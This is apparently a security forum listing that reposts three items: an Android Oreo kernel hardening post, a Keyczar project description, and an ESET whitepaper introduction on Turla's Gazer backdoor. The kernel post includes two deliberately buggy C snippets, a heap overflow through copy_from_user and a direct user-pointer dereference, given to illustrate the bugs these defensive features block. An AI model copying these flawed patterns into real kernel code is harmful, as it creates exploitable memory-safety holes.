* N, GPF_KERNEL); … /* results in buf smaller than size, and a heap overflow */ if (copy_from_user(buf, src, size)) return -EFAULT; /* never reached with CONFIG_HARDENED_USERCOPY=y */ } An example of a security issue that hardened usercopy prevents. Privileged Access Never (PAN) emulation While hardened usercopy functions help find and mitigate security issues, they can only help if developers actually use them. Currently, all kernel code, including drivers, can access user space memory directly, which can lead to various security issues. To mitigate this, CPU vendors have introduced features such as Supervisor Mode Access Prevention (SMAP) in x86 and Privileged Access Never (PAN) in ARM v8.1. These features prevent the kernel from accessing user space directly and ensure developers go through usercopy functions. Unfortunately, these hardware features are not yet widely available in devices that most Android users have today. Upstream Linux introduced software emulation for PAN in kernel version 4.3 for ARM and 4.10 in ARM64. We have backported both features to Android kernels starting from 3.18. Together with hardened usercopy, PAN emulation has helped find and fix bugs in four kernel drivers in Pixel devices. int buggy_driver_copy_data(struct mydata *src, void __user *ptr) { /* failure to keep track of user space pointers */ struct mydata *dst = (struct mydata *)ptr; … /* read/write from/to an arbitrary user space memory location */ dst->field = … ; /* use copy_(from|to)_user instead! */ … /* never reached with PAN (emulation) or SMAP */ } An example of a security issue that PAN emulation mitigates. Kernel Address Space Layout Randomization (KASLR) Android has included support for Address Space Layout Randomization (ASLR) for years. Randomizing memory layout makes code reuse attacks probabilistic and therefore more difficult for an attacker to exploit, especially remotely. Android 8.0 brings this feature to the kernel. While Linux has supported KASLR on x86 since version 3.14, KASLR for ARM64 has only been available upstream since Linux 4.6. Android 8.0 makes KASLR available in Android kernels 4.4 and newer. KASLR helps mitigate kernel vulnerabilities by randomizing the location where kernel code is loaded on each boot. On ARM64, for example, it adds 13–25 bits of entropy depending on the memory configuration of the device, which makes code reuse attacks more difficult. Post-init read-only memory The final hardening feature extends existing memory protections in the kernel by creating a memory region that's marked read-only after the kernel has been initialized. This makes it possible for developers to improve protection on data that needs to be writable during initialization, but shouldn't be modified after that. Having less writable memory reduces the internal attack surface of the kernel, making exploitation harder. Post-init read-only memory was introduced in upstream kernel version 4.6 and we have backported it to Android kernels 3.18 and newer. While we have applied these protections to some data structures in the core kernel, this feature is extremely useful for developers working on kernel drivers. Conclusion Android Oreo includes mitigations for the most common source of security bugs in the kernel. This is especially relevant because 85% of kernel security bugs in Android have been in vendor drivers that tend to get much less scrutiny. These updates make it easier for driver developers to discover common bugs during development, stopping them before they can reach end user devices. Sursa: https://android-developers.googleblog.com/2017/08/hardening-kernel-in-android-oreo.html
      • 1
      • Upvote
  24. Nytro

    Keyczar

    Keyczar Important note: KeyCzar has some known security issues which may influence your decision to use it. See Known Security Issues. Introduction Keyczar is an open source cryptographic toolkit designed to make it easier and safer for developers to use cryptography in their applications. Keyczar supports authentication and encryption with both symmetric and asymmetric keys. Some features of Keyczar include: A simple API Key rotation and versioning Safe default algorithms, modes, and key lengths Automated generation of initialization vectors and ciphertext signatures Java, Python, and C++ implementations International support in Java Keyczar was originally developed by members of the Google Security Team and is released under an Apache 2.0 license. Quick Links Known Security Issues Discussion Group Design Document (PDF) Why Keyczar? Cryptography is easy to get wrong. Developers can choose improper cipher modes, use obsolete algorithms, compose primitives in an unsafe manner, or fail to anticipate the need for key rotation. Keyczar abstracts some of these details by choosing safe defaults, automatically tagging outputs with key version information, and providing a simple programming interface. Keyczar is designed to be open, extensible, and cross-platform compatible. It is not intended to replace existing cryptographic libraries like OpenSSL, PyCrypto, or the Java JCE, and in fact is built on these libraries. Sursa: https://github.com/google/keyczar
      • 1
      • Upvote
  25. Introduction Herein we release our analysis of a previously undocumented backdoor that has been targeted against embassies and consulates around the world leads us to attribute it, with high confidence, to the Turla group. Turla is a notorious group that has been targeting governments, government officials and diplomats for years. They are known to run watering hole and spearphishing campaigns to better pinpoint their targets. Although this backdoor has been actively deployed since at least 2016, it has not been documented anywhere. Based on strings found in the samples we analyzed, we have named this backdoor “Gazer”. Recently, the Turla APT group has seen extensive news coverage surrounding its campaigns, something we haven’t seen for a long time. The Intercept reported that there exists a 2011 presentation by Canada’s Communication Security Establishment (CSE) outlining the errors made by the Turla operators during their operations even though the tools they use are quite advanced. The codename for Turla APT group in this presentation is MAKERSMARK. Gazer is, similar to its siblings in the Turla family, using advanced methods to spy and persist on its targets. This whitepaper highlights the campaigns in which Gazer was used and also contains a technical analysis of its functionalities. Download: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
      • 1
      • Upvote
×
×
  • Create New...